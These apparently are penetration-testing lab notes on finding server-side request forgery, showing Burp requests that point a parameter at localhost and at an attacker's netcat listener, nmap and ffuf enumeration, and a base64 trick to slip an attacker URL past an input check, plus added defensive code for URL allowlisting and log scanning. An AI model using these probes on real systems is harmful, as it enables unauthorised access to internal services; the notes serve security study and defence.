01.DISCOVERY
POINTING WEBAPP TO ITSELF
root@oco:~$ burpsuite
BROWSER > FoxyProxy > Burp
BURP SUITE > Proxy > Intercept is on
BROWSER > {targetSite:port}
input field: submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://dateserver.htb/availability.php&date=2024-01-01
BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://127.0.0.1/index.php&date=2024-01-02
- SSRF can be validated if the URL in the parameter can be changed to point to another URL;
if the response reports no error, the application fetched the substituted URL and is vulnerable to SSRF
- changing the default URL in the dateserver parameter to http://127.0.0.1/index.php
tests whether the web application requests its own index page without error
- this method also shows whether the SSRF is blind (the fetched content is not reflected in the response) or whether the fetched content is returned
Response
...
HTTP 200 OK
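Added example, not from these notes or the lab: the server-side check that would have blocked the 127.0.0.1 test above. A vulnerable handler forwards whatever the dateserver parameter contains; the hardened one accepts only http/https URLs whose host is on an allowlist and whose resolved addresses are not loopback, private or link-local. The allowlist entry dateserver.htb comes from the notes; the function names, the injectable resolver and the fake DNS table in the usage call are my own constructions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hosts the application legitimately fetches from (assumption based on the notes).
ALLOWED_HOSTS = {"dateserver.htb"}
ALLOWED_SCHEMES = {"http", "https"}


def resolve_all(host):
    """Every address the host resolves to (A and AAAA); real DNS lookup."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_internal(addr):
    """True for loopback, RFC1918/ULA, link-local, multicast, reserved or unspecified addresses."""
    ip = ipaddress.ip_address(addr)
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_dateserver_url(url, resolver=resolve_all):
    """Validate a user-supplied dateserver URL.

    Returns (ok, reason).  `resolver` is injectable so the check can be
    exercised offline; production code keeps the default DNS resolver.
    """
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    if host not in ALLOWED_HOSTS:            # rejects 127.0.0.1, [::1], any foreign host
        return False, f"host {host!r} not on allowlist"
    try:
        addrs = resolver(host)
    except (socket.gaierror, KeyError):
        return False, f"host {host!r} does not resolve"
    for addr in addrs:
        if is_internal(addr):                # allowlisted name pointing back inside (rebinding, split DNS)
            return False, f"{host} resolves to internal address {addr}"
    return True, "ok"


# Vulnerable pattern from the notes: the parameter value is used as-is.
def availability_vulnerable(form, fetch):
    return fetch(form["dateserver"])


# Hardened pattern: validate first, refuse (do not fetch) on failure.
def availability_hardened(form, fetch, resolver=resolve_all):
    ok, reason = check_dateserver_url(form["dateserver"], resolver)
    if not ok:
        raise ValueError(f"rejected dateserver URL: {reason}")
    return fetch(form["dateserver"])


if __name__ == "__main__":
    # Constructed resolver so the demo runs offline; the address is just a public-range placeholder.
    fake_dns = {"dateserver.htb": {"93.184.216.34"}}.__getitem__
    for candidate in ("http://dateserver.htb/availability.php",
                      "http://127.0.0.1/index.php",
                      "http://10.10.14.35:4444/",
                      "ftp://dateserver.htb/availability.php"):
        print(candidate, "->", check_dateserver_url(candidate, fake_dns))
```

The allowlist check runs before DNS, so a loopback or foreign address fails fast; the resolver check catches an allowlisted name that resolves back to an internal address. Validating by name and then fetching by name still leaves a window in which the name can change between the two lookups, so the HTTP client should connect to the already-validated address or re-check at connect time.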
VIA NETCAT
root@oco:~$ nc -nlvp 8080
root@oco:~$ burpsuite
BROWSER > FoxyProxy > Burp
BURP SUITE > Proxy > Intercept is on
BROWSER > {targetSite:port}
input field: submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://dateserver.htb/availability.php&date=2024-01-01
BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://{attackerIP:port}&date=2024-01-02
- pointing the dateserver parameter at a listener you control (nc -nlvp 8080 above) tests whether the server makes outbound requests to an arbitrary host;
a connection arriving on the listener confirms the SSRF even if the response body reveals nothing
- the request captured by netcat (method, path, Host header) shows exactly what the server sent
- this method therefore also confirms a blind SSRF, where the response alone would not
Response
...
HTTP 200 OK
root@oco:~$ ...Netcat listener receives the connection
connect to {attackerIP} from (UNKNOWN) [172.17.0.2] 32928
GET /index.php HTTP/1.1
Host: 172.17.0.1:8000
Accept: */*
METHOD 3
root@oco:~$ sudo nmap -sC -sV -T4 10.129.202.133 -p-
PORT STATE SERVICE VERSION
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title.
3001/tcp open http PHP cli server 5.5 or later
|_http-title: Login
3002/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title.
3003/tcp open http PHP cli server 5.5 or later (PHP 7.4.3)
root@oco:~$ sudo nmap --script=vuln -T4 10.129.202.133 -p 3000-3003
PORT STATE SERVICE
3000/tcp open ppp
3001/tcp open nessus
3002/tcp open exlm-agent
3003/tcp open cgms
root@oco:~$ find / -iname directory-list*
/usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
root@oco:~$ cp /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt .
root@oco:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://{targetSite.tld}:{port}/FUZZ -t 100 -ic
api [Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 14ms]
API [Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 9ms]
* -w specifies the wordlist
* -u specifies the url
* -t increases the number of threads
* -ic ignores commented lines in the wordlist (default: false)
root@oco:~$ curl http://10.129.202.133:3000/api
{"status":"UP"}
* try this on Kibana
#perform API endpoint fuzzing with the common-api-endpoints-mazen160.txt list
root@oco:~$ find / -iname common-api* 2>/dev/null
/usr/share/seclists/Discovery/Web-Content/common-api-endpoints-mazen160.txt
root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/common-api-endpoints-mazen160.txt .
root@oco:~$ ffuf -w common-api-endpoints-mazen160.txt -u 'http://{targetSite:port}/api/FUZZ' -t 100 -ic
download [Status: 200, Size: 71, Words: 5, Lines: 1, Duration: 27ms]
userinfo [Status: 200, Size: 71, Words: 5, Lines: 1, Duration: 27ms]
root@oco:~$ curl 'http://10.129.156.72:3000/api/userinfo'
{"success":false,"error":"'id' parameter is not given."}
root@oco:~$ ifconfig
...
10.10.14.35
root@oco:~$ nc -nlvp 4444
listening on [any] 4444 ...
root@oco:~$ curl "http://{targetSite:port}/api/userinfo?id=http://{attackerIP}:{port}"
{"success":false,"error":"'id' parameter is invalid."}
* if the parameter rejects a plain URL with an error, base64 encode the payload and retry
#encode the payload
root@oco:~$ echo -n "http://10.10.14.35:4444" | base64
aHR0cDovLzEwLjEwLjE0LjM1OjQ0NDQ=
#identify the parameter via ffuf
root@oco:~$ ...
root@oco:~$ curl "http://10.129.156.72:3000/api/userinfo?id=aHR0cDovLzEwLjEwLjE0LjM1OjQ0NDQ="
...
listening on [any] 4444 ...
connect to [<VPN/TUN Adapter IP>] from (UNKNOWN) [<TARGET IP>] 50542
GET / HTTP/1.1
Accept: application/json, text/plain, */*
User-Agent: axios/0.24.0
Host: <VPN/TUN Adapter IP>:4444
Connection: close
* although the connection was closed, the inbound request on the listener shows that the target fetches attacker-supplied URLs, i.e. it is vulnerable to SSRF
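Added example, not from these notes: a log-review check for the base64-encoded id parameter seen above. It scans access-log lines in common log format (an assumption about the target's logging), decodes parameter values that are valid base64, and flags any value that turns out to be a URL, recording whether the host is an IP literal in loopback or private space. The attacker-URL base64 string is the one from the notes; the other log lines and values are constructed.

```python
import base64
import binascii
import ipaddress
import re
from urllib.parse import parse_qsl, urlsplit

# Common log format with a quoted request line (assumption about the target's logging).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")
URL_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)

# Constructed sample: line 3 carries the base64 value from the notes above,
# line 4 carries base64 of http://127.0.0.1/index.php, line 1 base64 of "user42".
SAMPLE_LOG = """\
10.10.14.35 - - [01/Jan/2024:10:00:01 +0000] "GET /api/userinfo?id=dXNlcjQy HTTP/1.1" 200 71
10.10.14.35 - - [01/Jan/2024:10:00:02 +0000] "GET /api/userinfo?id=http://10.10.14.35:4444 HTTP/1.1" 200 58
10.10.14.35 - - [01/Jan/2024:10:00:03 +0000] "GET /api/userinfo?id=aHR0cDovLzEwLjEwLjE0LjM1OjQ0NDQ= HTTP/1.1" 500 0
10.10.14.35 - - [01/Jan/2024:10:00:04 +0000] "GET /api/userinfo?id=aHR0cDovLzEyNy4wLjAuMS9pbmRleC5waHA= HTTP/1.1" 200 15
"""


def decode_if_base64(value):
    """Decoded text if value is valid base64 of printable ASCII, else None."""
    if len(value) % 4 or not B64_RE.fullmatch(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def host_is_internal(host):
    """True/False for an IP literal; None for a hostname (would need DNS to decide)."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return None
    return ip.is_loopback or ip.is_private or ip.is_link_local


def scan_log(log_text):
    """Return one finding per query parameter whose (decoded) value is a URL."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        # parse_qsl %-decodes (so %3D comes back as "=") but maps "+" to a space,
        # which would corrupt base64; keep "+" literal before parsing.
        query = target.query.replace("+", "%2B")
        for name, value in parse_qsl(query, keep_blank_values=True):
            decoded = decode_if_base64(value)
            candidate = decoded if decoded is not None else value
            if not URL_RE.match(candidate):
                continue
            host = urlsplit(candidate).hostname
            findings.append({
                "client": m.group("client"),
                "time": m.group("ts"),
                "path": target.path,
                "param": name,
                "encoded": decoded is not None,
                "url": candidate,
                "host": host,
                "internal": host_is_internal(host) if host else None,
                "status": int(m.group("status")),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        flag = "ENCODED " if f["encoded"] else ""
        print(f"{f['time']} {f['client']} {f['path']} {f['param']}={flag}{f['url']} "
              f"internal={f['internal']} status={f['status']}")
```

A URL in a parameter that is documented to take a numeric id is the signal, whether or not the response status was an error; the 500 on the encoded attacker URL matches the "connection closed" behaviour in the notes, and the hit on 127.0.0.1 is the one a defender should treat as a probe of the internal network.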